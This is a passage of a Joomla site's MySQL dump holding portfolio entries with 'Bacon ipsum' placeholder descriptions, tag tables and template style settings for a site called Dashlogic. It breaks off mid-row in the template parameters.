INSERT INTO `atlyh_spsimpleportfolio_items` VALUES (1,'Responsive news Template','responsive-news-template','images/showcase/showcase01.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"4\"]','',1,1,0,391,'2015-01-22 12:04:57',391,'2015-01-23 10:40:23',0,'0000-00-00 00:00:00'),(2,'Free Joomla Template','free-joomla-template','images/showcase/showcase02.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"1\"]','',1,1,0,391,'2015-01-22 12:05:55',391,'2015-01-23 10:40:31',0,'0000-00-00 00:00:00'),(3,'Helix Free Template','helix-free-template','images/showcase/showcase03.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"1\"]','',1,1,0,391,'2015-01-22 12:06:32',391,'2015-01-23 10:40:03',0,'0000-00-00 00:00:00'),(4,'Corporate Template','corporate-template','images/showcase/showcase04.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"3\"]','',1,1,0,391,'2015-01-22 12:07:01',391,'2015-01-23 10:29:07',391,'2015-01-23 10:39:40'),(5,'SP Page Builder','sp-page-builder','images/showcase/showcase05.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"2\"]','',1,1,0,391,'2015-01-22 12:07:30',391,'2015-01-23 10:28:54',0,'0000-00-00 00:00:00'),(6,'Organic Life Template','organic-life-template','images/showcase/showcase06.jpg','','<p>Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p>Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami. Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball.</p>\r\n<p>Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"1\"]','',1,1,0,391,'2015-01-23 10:06:10',391,'2015-01-23 10:28:42',0,'0000-00-00 00:00:00'),(7,'Helix V3 Free Template','helix-v3-free-template','images/showcase/showcase07.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"2\"]','',1,1,0,391,'2015-01-23 10:07:16',391,'2015-01-23 10:28:29',0,'0000-00-00 00:00:00'),(8,'Optima Premium Template','optima-premium-template','images/showcase/showcase08.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"2\"]','',1,1,0,391,'2015-01-23 10:08:10',391,'2015-01-23 10:28:18',0,'0000-00-00 00:00:00'),(9,'Vocal Music Theme','vocal-music-theme','images/showcase/showcase09.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"4\"]','',1,1,0,391,'2015-01-23 10:08:46',391,'2015-01-23 10:28:04',0,'0000-00-00 00:00:00'),(10,'Travel Premium Theme','travel-premium-theme','images/showcase/showcase10.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"1\"]','',1,1,0,391,'2015-01-23 10:09:23',391,'2015-01-23 10:27:52',0,'0000-00-00 00:00:00'),(11,'Free Magazine Theme','free-magazine-theme','images/showcase/showcase11.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"4\"]','',1,1,0,391,'2015-01-23 10:09:59',391,'2015-01-23 10:27:42',0,'0000-00-00 00:00:00'),(12,'Minima Joomla Template','minima-joomla-template','images/showcase/showcase12.jpg','','<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Bacon ipsum dolor amet pork belly turducken strip steak meatloaf short ribs corned beef. Sausage landjaeger frankfurter leberkas chicken. Ball tip short loin picanha cow sausage. Short loin swine sausage, shank tail ham ball tip jerky boudin.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Sirloin pork loin beef andouille capicola shank swine chuck flank tri-tip. Capicola kevin filet mignon porchetta doner short ribs flank. Capicola pork chop turducken, ground round shoulder ribeye cupim doner jowl. Turkey shank pork belly jerky salami.</p>\r\n<p style=\"border: 0px; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline; font-family: Georgia, \'Bitstream Charter\', serif; font-size: 16px; line-height: 24px; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: 0px 0px; background-repeat: initial;\">Chicken kevin pastrami tenderloin, tail corned beef prosciutto sirloin ribeye beef ribs pork chop tri-tip swine meatball. Pork chop swine porchetta fatback, strip steak filet mignon ham beef chicken meatloaf. Drumstick spare ribs corned beef, cow andouille cupim shankle pork beef ribs bacon flank salami leberkas. Shank turducken t-bone corned beef ground round shoulder cow beef ribs leberkas ribeye pork venison kevin meatloaf landjaeger. Ball tip jowl tongue venison. Ground round cow pork loin, sirloin venison cupim ham hock hamburger.</p>','[\"1\"]','',1,1,0,391,'2015-01-23 10:10:38',391,'2015-01-23 10:27:30',0,'0000-00-00 00:00:00');
/*!40000 ALTER TABLE `atlyh_spsimpleportfolio_items` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_spsimpleportfolio_tags`
--
DROP TABLE IF EXISTS `atlyh_spsimpleportfolio_tags`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_spsimpleportfolio_tags` (
`spsimpleportfolio_tag_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`alias` varchar(55) NOT NULL,
PRIMARY KEY (`spsimpleportfolio_tag_id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_spsimpleportfolio_tags`
--
LOCK TABLES `atlyh_spsimpleportfolio_tags` WRITE;
/*!40000 ALTER TABLE `atlyh_spsimpleportfolio_tags` DISABLE KEYS */;
INSERT INTO `atlyh_spsimpleportfolio_tags` VALUES (1,'Joomla','joomla'),(2,'Responsive','responsive'),(3,'Corporate','corporate'),(4,'Magazine','magazine');
/*!40000 ALTER TABLE `atlyh_spsimpleportfolio_tags` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_tags`
--
DROP TABLE IF EXISTS `atlyh_tags`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_tags` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`parent_id` int(10) unsigned NOT NULL DEFAULT 0,
`lft` int(11) NOT NULL DEFAULT 0,
`rgt` int(11) NOT NULL DEFAULT 0,
`level` int(10) unsigned NOT NULL DEFAULT 0,
`path` varchar(255) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL,
`alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`note` varchar(255) NOT NULL DEFAULT '',
`description` mediumtext NOT NULL,
`published` tinyint(1) NOT NULL DEFAULT 0,
`checked_out` int(11) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`access` int(10) unsigned NOT NULL DEFAULT 0,
`params` text NOT NULL,
`metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.',
`metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.',
`metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.',
`created_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by_alias` varchar(255) NOT NULL DEFAULT '',
`modified_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`images` text NOT NULL,
`urls` text NOT NULL,
`hits` int(10) unsigned NOT NULL DEFAULT 0,
`language` char(7) NOT NULL,
`version` int(10) unsigned NOT NULL DEFAULT 1,
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`id`),
KEY `tag_idx` (`published`,`access`),
KEY `idx_access` (`access`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_path` (`path`),
KEY `idx_left_right` (`lft`,`rgt`),
KEY `idx_alias` (`alias`),
KEY `idx_language` (`language`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_tags`
--
LOCK TABLES `atlyh_tags` WRITE;
/*!40000 ALTER TABLE `atlyh_tags` DISABLE KEYS */;
INSERT INTO `atlyh_tags` VALUES (1,0,0,1,0,'','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'','','','',692,'2011-01-01 00:00:01','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `atlyh_tags` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_template_styles`
--
DROP TABLE IF EXISTS `atlyh_template_styles`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_template_styles` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`template` varchar(50) NOT NULL DEFAULT '',
`client_id` tinyint(1) unsigned NOT NULL DEFAULT 0,
`home` char(7) NOT NULL DEFAULT '0',
`title` varchar(255) NOT NULL DEFAULT '',
`params` text NOT NULL,
PRIMARY KEY (`id`),
KEY `idx_template` (`template`),
KEY `idx_home` (`home`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_template_styles`
--
LOCK TABLES `atlyh_template_styles` WRITE;
/*!40000 ALTER TABLE `atlyh_template_styles` DISABLE KEYS */;
INSERT INTO `atlyh_template_styles` VALUES (4,'beez3',0,'0','Beez3 - Fruit Shop','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"\",\"sitetitle\":\"Fruit Shop\",\"sitedescription\":\"The freshest fruit for you\",\"navposition\":\"left\",\"bootstrap\":\"\",\"templatecolor\":\"red\",\"headerImage\":\"\",\"backgroundcolor\":\"#eee\"}'),(5,'hathor',1,'0','Hathor - Default','{\"showSiteName\":\"0\",\"colourChoice\":\"\",\"boldText\":\"0\"}'),(7,'protostar',0,'0','protostar - Default','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}'),(8,'isis',1,'1','isis - Default','{\"templateColor\":\"\",\"logoFile\":\"\"}'),(9,'beez3',0,'0','Beez3 - Default','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"\",\"sitetitle\":\"Joomla!\",\"sitedescription\":\"Open Source Content Management\",\"navposition\":\"left\",\"bootstrap\":\"\",\"templatecolor\":\"personal\",\"headerImage\":\"\",\"backgroundcolor\":\"#eee\"}'),(10,'shaper_helix3',0,'1','Dashlogic','{\"sticky_header\":\"1\",\"favicon\":\"\",\"boxed_layout\":\"0\",\"logo_type\":\"image\",\"logo_position\":\"logo\",\"logo_image\":\"images\\/logo.png\",\"logo_image_2x\":\"images\\/logo.png\",\"mobile_logo\":\"images\\/logo.png\",\"logo_text\":\"\",\"logo_slogan\":\"\",\"body_bg_image\":\"\",\"body_bg_repeat\":\"inherit\",\"body_bg_size\":\"inherit\",\"body_bg_attachment\":\"inherit\",\"body_bg_position\":\"0 0\",\"enabled_copyright\":\"1\",\"copyright_position\":\"footer1\",\"copyright\":\"© 2016 Dashlogic. All Rights Reserved. Site By 